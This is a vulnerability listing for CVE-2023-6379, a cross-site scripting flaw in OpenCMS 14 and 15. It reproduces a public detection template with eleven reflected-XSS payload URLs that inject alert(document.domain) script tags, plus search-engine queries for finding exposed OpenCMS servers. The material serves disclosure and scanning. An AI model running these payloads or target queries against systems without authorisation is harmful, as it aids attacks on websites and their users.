CVE-2023-6379: OpenCMS 14 & 15 - Cross Site Scripting

Date: 2025-08-01 | Affected software: OpenCMS | PoC: Public

Vulnerability Description

Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.

PoC Code [Public]

id: CVE-2023-6379

info:
  name: OpenCMS 14 & 15 - Cross Site Scripting
  author: msegoviag
  severity: medium
  description: |
    Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.
  remediation: |
    Update to version OpenCMS 16
  reference:
    - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2023-6379
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6379
    - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alkacon-software-opencms
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/msegoviag/msegoviag
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6379
    cwe-id: CWE-79
    epss-score: 0.18616
    epss-percentile: 0.95037
    cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 11
    vendor: alkacon
    product: opencms
    shodan-query:
      - title:"opencms"
      - http.title:"opencms"
      - cpe:"cpe:2.3:a:alkacon:opencms"
      - /opencms/
    fofa-query: title="opencms"
    google-query: intitle:"opencms"
  tags: cve2023,cve,opencms,xss,alkacon

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - '/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1'
        - '/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>" />'
          - 'OpenCms'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ef017bb32e1ffb67bb0305c8cd63cfa8cd0d60f5f87a3b6d1bb7df35a9699ddd022100c4c32e64255f644138031adeaecd2a57e27f568340bd39b587a2aa58a4912b4c:922c64590222798bb761d5b6d8e72950
